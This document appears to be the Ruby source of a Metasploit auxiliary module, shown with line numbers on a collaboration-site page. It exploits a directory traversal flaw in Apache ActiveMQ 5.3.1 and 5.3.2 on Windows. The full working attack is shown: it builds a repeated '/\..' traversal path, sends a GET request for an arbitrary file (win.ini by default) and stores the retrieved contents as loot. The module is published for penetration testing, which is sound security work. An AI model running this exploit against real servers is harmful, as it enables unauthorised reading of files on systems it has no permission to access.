Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::HttpClient
8
  include Msf::Auxiliary::Report
9
  include Msf::Auxiliary::Scanner
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'Apache ActiveMQ Directory Traversal',
14
      'Description'    => %q{
15
          This module exploits a directory traversal vulnerability in Apache ActiveMQ
16
        5.3.1 and 5.3.2 on Windows systems. The vulnerability exists in the Jetty's
17
        ResourceHandler installed with the affected versions. This module has been tested
18
        successfully on ActiveMQ 5.3.1 and 5.3.2 over Windows 2003 SP2.
19
      },
20
      'License'        => MSF_LICENSE,
21
      'Author'         =>
22
        [
23
          'AbdulAziz Hariri', # Vulnerability discovery
24
          'juan vazquez' # Metasploit module
25
        ],
26
      'References'     =>
27
        [
28
          [ 'OSVDB', '86401' ],
29
          [ 'URL', 'http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=895' ],
30
          [ 'URL', 'https://issues.apache.org/jira/browse/amq-2788' ]
31
        ]
32
    ))
33

34
    register_options(
35
      [
36
        Opt::RPORT(8161),
37
        OptString.new('FILEPATH', [true, 'The name of the file to download', '/windows\\win.ini']),
38
        OptInt.new('DEPTH', [false, 'Traversal depth if absolute is set to false', 4])
39
      ])
40
  end
41

42
  def run_host(ip)
43
    # No point to continue if no filename is specified
44
    if datastore['FILEPATH'].nil? or datastore['FILEPATH'].empty?
45
      print_error("#{rhost}:#{rport} - Please supply FILEPATH")
46
      return
47
    end
48

49
    travs = "/\\.." * (datastore['DEPTH'] || 1)
50
    travs << "/" unless datastore['FILEPATH'][0] == "\\" or datastore['FILEPATH'][0] == "/"
51
    travs << datastore['FILEPATH']
52

53
    print_status("#{rhost}:#{rport} - Sending request...")
54
    res = send_request_cgi({
55
      'uri'          => travs,
56
      'method'       => 'GET',
57
    })
58

59
    if res and res.code == 200
60
      contents = res.body
61
      fname = File.basename(datastore['FILEPATH'])
62
      path = store_loot(
63
        'apache.activemq',
64
        'application/octet-stream',
65
        ip,
66
        contents,
67
        fname
68
      )
69
      print_status("#{rhost}:#{rport} - File saved in: #{path}")
70
    else
71
      print_error("#{rhost}:#{rport} - Failed to retrieve file")
72
      return
73
    end
74
  end
75
end
76

77